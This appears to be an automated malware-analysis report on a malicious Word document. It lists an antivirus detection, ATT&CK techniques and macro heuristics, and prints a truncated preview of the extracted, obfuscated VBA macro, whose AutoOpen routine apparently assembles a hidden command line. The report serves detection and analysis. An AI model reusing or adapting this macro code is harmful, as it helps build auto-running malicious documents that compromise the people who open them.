MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and utilizes the Shell() function, indicating an attempt to execute arbitrary code. This macro likely downloads and executes a second-stage payload, a common technique for malware delivery. The ClamAV detection further confirms its malicious nature.
Heuristics 6
-
ClamAV: Doc.Malware.Valyria-6698777-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6698777-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 105711 bytes |
SHA-256: a76d5205b310b11b298635a73e0e194fdaad6edf0538249b2b5a72ca3275d3c1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "FbANqwokLfh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim KdwSvi(2)
KdwSvi(0) = MidB(KzIjf + KjlmBRLbzWwrfoACo + CtRiRp, 878, 790) + MidB(EEhsZk + IRWSZjjSSUjcRjsVSzMR + FtdkzGDB, 763, 613)
KdwSvi(1) = Left(kUlAh + VdonUvLPfOvAjdEzTMQip + jwYkRR, 811) + Left(LRGIpn + WYkMSGAziCPEzzBwIfNzFK + CfvJjm, 538) + MidB(BKQqYl + naNLREKYQJJbfCzTAZWccr + nvYku, 841, 271) + Mid(EHkakjH + woWIPCRUJRwkTWizjO + NSwjMs, 310, 860)
Dim Jsuif(2)
Jsuif(0) = Left(JcWEAl + CWNwIpDhIpTWNZEraaoZ + dWmuJ, 241) + Right(tKVCuGQ + TVqLzDSnwttMNviTRnR + rcCDC, 431)
Jsuif(1) = Right(UPUDBri + cWOnihwfzcwoYhUXtAP + SYwst, 410) + Right(tiLuh + vFiWWijqSiUjiMFM + kEfKv, 541)
Dim WPtPwC(2)
WPtPwC(0) = MidB(pktpV + OnQuUQiohraofFjbt + NtRzKw, 917, 685) + Left(jfJvlRoL + EiHcfuAnIuGoXdVNRm + tqDDsuo, 852)
WPtPwC(1) = Right(jSfmoUPw + rDdrQVOnwpuwBNqIKzQiT + tlpBzTv, 179) + Right(MMmWfAZR + TiYBrZpwbYKjqcSAWwpMXZ + lfwrM, 411) + Mid(PMnJY + MNRCdwCCGQbmdRcVEAwkM + jMPKJ, 540, 859) + Mid(zFXmHqc + vtjdwLLDZPNcFMimszoi + SvEpN, 262, 474)
lMYOiLwkBTJUC (KeyString(HrLKbn + thnsGaPB + 14 + 21 + 32 + MAwpUAAL + LbrbbdLm) + ftMSL + QidQJOi + KeyString(OSWKJ + XhSpLQc + 17 + 24 + 36 + sTOSojd + jhYiCM) + sCPlUZzil + JiaBZjbdA + zsTTDEjCG + tMofYiIjkE + jCYvCvjtoRN + omrqjDd + vdGOEw + TTPWAK)
Dim IpCnHL(1)
IpCnHL(0) = Right(fPGrqLq + oRnHUitQPklvvTFjAMJ + diosliId, 84) + Right(thnoG + qwvqjUWXGGKhqdluBj + HhBkB, 734) + Left(druSoB + UjOLBWuiLrJCLHioJijKkrp + UNtoqm, 506) + Right(WFknXF + VORkMJzNQkViTMsRSDTQ + NmjDWLi, 409)
Dim aMhIE(1)
aMhIE(0) = Left(NVpzrCs + NnXrCfwzWPJHFowlju + XcFuvl, 431) + MidB(KKzqzwSc + JhiRGQjCEGMRLZzEkMcnYzw + CpfJzL, 852, 623)
Dim lqWIft(2)
lqWIft(0) = MidB(iwKbTjdi + ozCwTYVASDENJqXwCVE + iaZSEDnh, 246, 324) + Mid(lpWzjKsV + iBXGqGkDkqKSJQziVrzh + AABWLLn, 911, 3)
lqWIft(1) = MidB(uwMhzK + CaWdzWtvbmlTMipFsYDPSAb + kzXjjr, 167, 32) + Mid(DzRQwU + EhUWbfVRwKEHbKtDF + EcLjfja, 151, 128) + MidB(uXhwN + BOZKqtisqGDFbdrL + zuKsPzi, 961, 493) + Mid(YtDmCull + nkBDivovGCcaCRaaKjS + fXFSZ, 682, 116)
Dim zdMmT(2)
zdMmT(0) = Mid(wtlRwjV + WjtGRJITNZzMGTtGaXaJJoAD + EGJlDoLm, 738, 866) + Right(soGEml + XriXwYXkSRFmVtMJRHGU + EfmCE, 28)
zdMmT(1) = MidB(EaMblm + oCUbkjWupacUKRWTtJUjQCoh + iiZiYTE, 1, 684) + Left(IrDPam + JqIVtlkTDZvBbNBzwrM + tYkRQRp, 309)
End Sub
Attribute VB_Name = "lLKIplE"
Function sCPlUZzil()
ANCXb = "d \\ / / " + "//\ /V:O/C" + """" + "set {+@?=" + "7a02 a207 0a72 20" + "7a 27a0 a0"
Dim qjaoM(2)
qjaoM(0) = MidB(NDvpBTKh + PshrkfsifJXCGhCqmc + lMUfWAO, 387, 897) + MidB(JZwTGWvw + jIDXnvHraiYNwhJrQLO + NcHOv, 373, 835)
qjaoM(1) = Left(ICDQI + cMDIKLCnqpmEUmzJK + LXiCPF, 878) + MidB(ZZmnwLNv + EbFdFbwiQTwZQGaIVFIMr + SiMJZ, 25, 638)
Dim vGudbY(2)
vGudbY(0) = Left(KfaAW + fnnGLvONsINkYqjjKulw + zzBMpLww, 288) + Left(Oahojsj + KYmUMJpWDuqFwNBXhM + vEEqzr, 574)
vGudbY(1) = MidB(LPnZK + frGaLiwITqSrIDDrPITVzs + iqVonjBs, 800, 116) + Right(MIvZj + JvIJsTRrMWIsRSvi + qQNzDti, 144) + MidB(owhsuWhd + PJfTzJUqddCSiuJpc + fShMz, 317, 957) + Right(SLiWjlu + tKQiQmzJPbXoqfMlkKjWv + qQBmt, 992)
Dim kpKHG(2)
kpKHG(0) = Left(kZKIjwzm + oTjLXpJmAwDPZLwJwLKEG + GWLDN, 598) + MidB(azpNQiv + LAhJlwkzcDfiPcjnbjn + kwOGl, 150, 537)
kpKHG(1) = Mid(WsFjBVZb + CmAwhNQEIsEYhUYnLQADnHX + KONAdw, 309, 503) + Right(jtVDd + RTXLdhszYCjNoKqzurbZRuo + kqNXK, 757) + MidB(wEhjV + aNqXMWCKswHpupwrMEL + ZwHrvM, 93, 469) + Mid(zEDQYiiU + MfAJsmririPiSzLZznZT + BNYXMdjI, 997, 236)
Dim QSIzH(2)
QSIzH(0) = MidB(KEVsGh + MskdSHWjfHlLjQwwKbi + zzfUL, 980, 820) + Right(rDibJW + HYTAnLadcIkHLildcCzkph + jvFGct, 323)
QSIzH(1) = Left(mGLlE + WipKfVzfAarHoirthkWf + sczXSjXL, 575) + Mid(sIoLD + bSZLRInuLJlADzTtaNRCjda + LChicvD, 489, 339)
Dim zwIUVt(2)
zwIUVt(0) = MidB(kVlSKP + ErmMEOqZMSNuHiQRMQd + WjKjbGN, 949, 138) + Right(IZhtj + CIbjVdnOtwKibZXEKzMwUG +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.